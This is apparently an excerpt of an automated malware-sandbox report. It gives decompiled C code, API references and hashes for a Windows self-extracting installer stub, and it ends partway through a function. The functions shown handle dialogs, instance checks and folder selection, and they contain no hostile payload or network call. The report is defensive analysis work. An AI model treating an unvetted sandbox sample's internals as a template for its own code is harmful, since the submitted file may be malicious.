                                                                                                                                                                                                    0x00172d34
                                                                                                                                                                                                    0x00172d3b
                                                                                                                                                                                                    0x00172d40
                                                                                                                                                                                                    0x00172d48
                                                                                                                                                                                                    0x00172d59
                                                                                                                                                                                                    0x00172d84
                                                                                                                                                                                                    0x00172e1f
                                                                                                                                                                                                    0x00172e1f
                                                                                                                                                                                                    0x00172e2e
                                                                                                                                                                                                    0x00172e41
                                                                                                                                                                                                    0x00172e5a
                                                                                                                                                                                                    0x00172e62
                                                                                                                                                                                                    0x00172e6c
                                                                                                                                                                                                    0x00172e6c
                                                                                                                                                                                                    0x00172e75
                                                                                                                                                                                                    0x00172e77
                                                                                                                                                                                                    0x00172e77
                                                                                                                                                                                                    0x00172e84
                                                                                                                                                                                                    0x00172e8b
                                                                                                                                                                                                    0x00172e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172e96
                                                                                                                                                                                                    0x00172e96
                                                                                                                                                                                                    0x00172e9e
                                                                                                                                                                                                    0x00172ea2
                                                                                                                                                                                                    0x00172eba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172ece
                                                                                                                                                                                                    0x00172ede
                                                                                                                                                                                                    0x00172eed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172eed
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172ea2
                                                                                                                                                                                                    0x00172e86
                                                                                                                                                                                                    0x00172e88
                                                                                                                                                                                                    0x00172e88
                                                                                                                                                                                                    0x00172e43
                                                                                                                                                                                                    0x00172e48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172e48
                                                                                                                                                                                                    0x00172e30
                                                                                                                                                                                                    0x00172e30
                                                                                                                                                                                                    0x00172ef8
                                                                                                                                                                                                    0x00172f01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f01
                                                                                                                                                                                                    0x00172d8a
                                                                                                                                                                                                    0x00172d8f
                                                                                                                                                                                                    0x00172da1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172da3
                                                                                                                                                                                                    0x00172dae
                                                                                                                                                                                                    0x00172db4
                                                                                                                                                                                                    0x00172dbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172dca
                                                                                                                                                                                                    0x00172dd3
                                                                                                                                                                                                    0x00172df5
                                                                                                                                                                                                    0x00172e02
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172dd5
                                                                                                                                                                                                    0x00172dde
                                                                                                                                                                                                    0x00172de3
                                                                                                                                                                                                    0x00172e04
                                                                                                                                                                                                    0x00172e0a
                                                                                                                                                                                                    0x00172e10
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172e10
                                                                                                                                                                                                    0x00172dd3
                                                                                                                                                                                                    0x00172dbb
                                                                                                                                                                                                    0x00172da1
                                                                                                                                                                                                    0x00172d5b
                                                                                                                                                                                                    0x00172d5b
                                                                                                                                                                                                    0x00172d5d
                                                                                                                                                                                                    0x00172d69
                                                                                                                                                                                                    0x00172d6e
                                                                                                                                                                                                    0x00172f06
                                                                                                                                                                                                    0x00172f06
                                                                                                                                                                                                    0x00172f06
                                                                                                                                                                                                    0x00172d59
                                                                                                                                                                                                    0x00172f18

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00172CD9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00172CE9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00172CF9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00172D34
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00172D40
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00172DAE
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00172DBD
                                                                                                                                                                                                    • CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00172E0A
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
                                                                                                                                                                                                    • API String ID: 1002816675-1021407552
                                                                                                                                                                                                    • Opcode ID: 28fa7c0b276c473cd77780ca2e91dd5e8590ff7656516ca0b2df54b8dbbdc0a4
                                                                                                                                                                                                    • Instruction ID: 4149e0159278ad0ae3d3b68c2efa73041a3c82021b563890d34633c66f2f4234
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28fa7c0b276c473cd77780ca2e91dd5e8590ff7656516ca0b2df54b8dbbdc0a4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D851F5707803016BE724A7348D4AB7B36B8EB95710F54C039FA4DD69E1DFB888C6C621
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                    			E001734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				struct HWND__* _t35;
                                                                                                                                                                                                    				struct HWND__* _t38;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t9 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					 *0x1791d8 = 1;
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                    					EndDialog();
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				_pop(1);
                                                                                                                                                                                                    				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                    				if(_t12 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                    					if(_a12 != 0x1b) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t13 = _t12 - 0xe;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t35 = _a4;
                                                                                                                                                                                                    					 *0x178584 = _t35;
                                                                                                                                                                                                    					E001743D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                    					__eflags =  *0x178184; // 0x1
                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetWindowTextA(_t35, "nst0dum");
                                                                                                                                                                                                    					_t17 = CreateThread(0, 0, E00174FE0, 0, 0, 0x178798);
                                                                                                                                                                                                    					 *0x17879c = _t17;
                                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						E001744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					ResetEvent( *0x17858c);
                                                                                                                                                                                                    					_t38 =  *0x178584; // 0x0
                                                                                                                                                                                                    					_t25 = E001744B9(_t38, 0x4b2, 0x171140, 0, 0x20, 4);
                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						 *0x1791d8 = 1;
                                                                                                                                                                                                    						SetEvent( *0x17858c);
                                                                                                                                                                                                    						_t39 =  *0x17879c; // 0x0
                                                                                                                                                                                                    						E00173680(_t39);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetEvent( *0x17858c);
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                    					TerminateThread( *0x17879c, 0);
                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x001734fb
                                                                                                                                                                                                    0x001734fe
                                                                                                                                                                                                    0x00173665
                                                                                                                                                                                                    0x00173666
                                                                                                                                                                                                    0x00173666
                                                                                                                                                                                                    0x00173668
                                                                                                                                                                                                    0x0017366e
                                                                                                                                                                                                    0x0017366e
                                                                                                                                                                                                    0x00173671
                                                                                                                                                                                                    0x00173671
                                                                                                                                                                                                    0x00173677
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173677
                                                                                                                                                                                                    0x00173504
                                                                                                                                                                                                    0x00173506
                                                                                                                                                                                                    0x00173507
                                                                                                                                                                                                    0x0017350c
                                                                                                                                                                                                    0x0017365b
                                                                                                                                                                                                    0x0017365f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173661
                                                                                                                                                                                                    0x00173512
                                                                                                                                                                                                    0x00173515
                                                                                                                                                                                                    0x001735be
                                                                                                                                                                                                    0x001735c1
                                                                                                                                                                                                    0x001735d1
                                                                                                                                                                                                    0x001735d8
                                                                                                                                                                                                    0x001735de
                                                                                                                                                                                                    0x001735f8
                                                                                                                                                                                                    0x00173617
                                                                                                                                                                                                    0x00173617
                                                                                                                                                                                                    0x00173623
                                                                                                                                                                                                    0x00173637
                                                                                                                                                                                                    0x0017363d
                                                                                                                                                                                                    0x00173642
                                                                                                                                                                                                    0x00173644
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173646
                                                                                                                                                                                                    0x00173652
                                                                                                                                                                                                    0x00173657
                                                                                                                                                                                                    0x00173658
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173658
                                                                                                                                                                                                    0x00173644
                                                                                                                                                                                                    0x0017351b
                                                                                                                                                                                                    0x0017351d
                                                                                                                                                                                                    0x0017354f
                                                                                                                                                                                                    0x00173553
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017355f
                                                                                                                                                                                                    0x00173565
                                                                                                                                                                                                    0x0017357c
                                                                                                                                                                                                    0x00173581
                                                                                                                                                                                                    0x00173584
                                                                                                                                                                                                    0x0017359b
                                                                                                                                                                                                    0x001735a1
                                                                                                                                                                                                    0x001735a7
                                                                                                                                                                                                    0x001735ad
                                                                                                                                                                                                    0x001735b3
                                                                                                                                                                                                    0x001735b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001735b8
                                                                                                                                                                                                    0x00173586
                                                                                                                                                                                                    0x00173588
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173590
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173590
                                                                                                                                                                                                    0x00173524
                                                                                                                                                                                                    0x00173535
                                                                                                                                                                                                    0x00173541
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173549
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00173535
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00173541
                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0017355F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00171140,00000000,00000020,00000004), ref: 00173590
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001735C7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 001735F1
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 001735F8
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00173610
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00173617
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00173623
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00178798), ref: 00173637
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00173671
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 2406144884-432003757
                                                                                                                                                                                                    • Opcode ID: 10b81a916eeaa5e9e8bf4ca2b0f39b2931cb982089d2308ca7d656c6dfb3c01a
                                                                                                                                                                                                    • Instruction ID: 86836bf33a4e3ca3b28c29a5bc8afabcbe0253d840a7418fd77760e10a6e6fad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b81a916eeaa5e9e8bf4ca2b0f39b2931cb982089d2308ca7d656c6dfb3c01a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31C771284300BBD7251F25EC4DE2B3B75EBC5B11F90C525F62E95AA1CB718AC0EB51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E00174224(char __ecx) {
                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					E001744B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t76 =  *0x1788c0; // 0x0
                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					 *0x1787a0 = 0;
                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                    					_v40 = 0x178598;
                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                    					_v32 = E00174200;
                                                                                                                                                                                                    					_v28 = 0x1788c0;
                                                                                                                                                                                                    					 *0x17a288( &_v52);
                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						 *0x17a288(_t32, 0x1788c0);
                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *0x1788c0 != 0) {
                                                                                                                                                                                                    							E00171680(0x1787a0, 0x104, 0x1788c0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x17a288(_v12);
                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t85 =  *0x1787a0; // 0x0
                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetTempPathA(0x104, 0x1788c0);
                                                                                                                                                                                                    					_t61 = 0x1788c0;
                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0x1788c1
                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0x1788c0; // 0x2f1181
                                                                                                                                                                                                    					_t44 = CharPrevA(0x1788c0, _t5);
                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0x1788c0, _t44)) != 0x3a) {
                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00174234
                                                                                                                                                                                                    0x0017423c
                                                                                                                                                                                                    0x00174240
                                                                                                                                                                                                    0x001743b2
                                                                                                                                                                                                    0x001743b7
                                                                                                                                                                                                    0x001743c0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001743c5
                                                                                                                                                                                                    0x0017424c
                                                                                                                                                                                                    0x00174252
                                                                                                                                                                                                    0x00174257
                                                                                                                                                                                                    0x001743a4
                                                                                                                                                                                                    0x001743a5
                                                                                                                                                                                                    0x001743ab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001743ab
                                                                                                                                                                                                    0x00174263
                                                                                                                                                                                                    0x00174269
                                                                                                                                                                                                    0x0017426e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017427a
                                                                                                                                                                                                    0x00174280
                                                                                                                                                                                                    0x00174285
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017428d
                                                                                                                                                                                                    0x00174293
                                                                                                                                                                                                    0x001742e6
                                                                                                                                                                                                    0x001742e9
                                                                                                                                                                                                    0x001742ef
                                                                                                                                                                                                    0x001742f4
                                                                                                                                                                                                    0x001742f7
                                                                                                                                                                                                    0x00174300
                                                                                                                                                                                                    0x00174307
                                                                                                                                                                                                    0x0017430e
                                                                                                                                                                                                    0x00174315
                                                                                                                                                                                                    0x0017431c
                                                                                                                                                                                                    0x00174322
                                                                                                                                                                                                    0x00174326
                                                                                                                                                                                                    0x0017432d
                                                                                                                                                                                                    0x0017432d
                                                                                                                                                                                                    0x0017432f
                                                                                                                                                                                                    0x00174334
                                                                                                                                                                                                    0x00174343
                                                                                                                                                                                                    0x00174349
                                                                                                                                                                                                    0x0017434d
                                                                                                                                                                                                    0x00174354
                                                                                                                                                                                                    0x00174354
                                                                                                                                                                                                    0x0017435d
                                                                                                                                                                                                    0x0017436e
                                                                                                                                                                                                    0x0017436e
                                                                                                                                                                                                    0x0017437d
                                                                                                                                                                                                    0x00174383
                                                                                                                                                                                                    0x00174387
                                                                                                                                                                                                    0x0017438e
                                                                                                                                                                                                    0x0017438e
                                                                                                                                                                                                    0x00174387
                                                                                                                                                                                                    0x00174391
                                                                                                                                                                                                    0x00174399
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174295
                                                                                                                                                                                                    0x0017429f
                                                                                                                                                                                                    0x001742a5
                                                                                                                                                                                                    0x001742aa
                                                                                                                                                                                                    0x001742aa
                                                                                                                                                                                                    0x001742ad
                                                                                                                                                                                                    0x001742ad
                                                                                                                                                                                                    0x001742af
                                                                                                                                                                                                    0x001742b0
                                                                                                                                                                                                    0x001742b6
                                                                                                                                                                                                    0x001742c2
                                                                                                                                                                                                    0x001742c8
                                                                                                                                                                                                    0x001742ce
                                                                                                                                                                                                    0x001742e4
                                                                                                                                                                                                    0x001742e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001742ce

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00174236
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0017424C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00174263
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0017427A
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,001788C0,?,00000001), ref: 0017429F
                                                                                                                                                                                                    • CharPrevA.USER32(001788C0,002F1181,?,00000001), ref: 001742C2
                                                                                                                                                                                                    • CharPrevA.USER32(001788C0,00000000,?,00000001), ref: 001742D6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00174391
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001743A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                    • Opcode ID: ce78c2ecb7e73eaff100dda1812413ea3b304532cf47c0e0aca05f217f2476b2
                                                                                                                                                                                                    • Instruction ID: 5dc9dc32e4ecc000b6ee703b6e821688a9105f37555b68febb79b9caca2733a4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce78c2ecb7e73eaff100dda1812413ea3b304532cf47c0e0aca05f217f2476b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF412674A80210AFE711AF74DC8CA6E7BB4FF49344F8485A9F90DA3251CB748D81C762
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00172773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                    				void* __ebx;
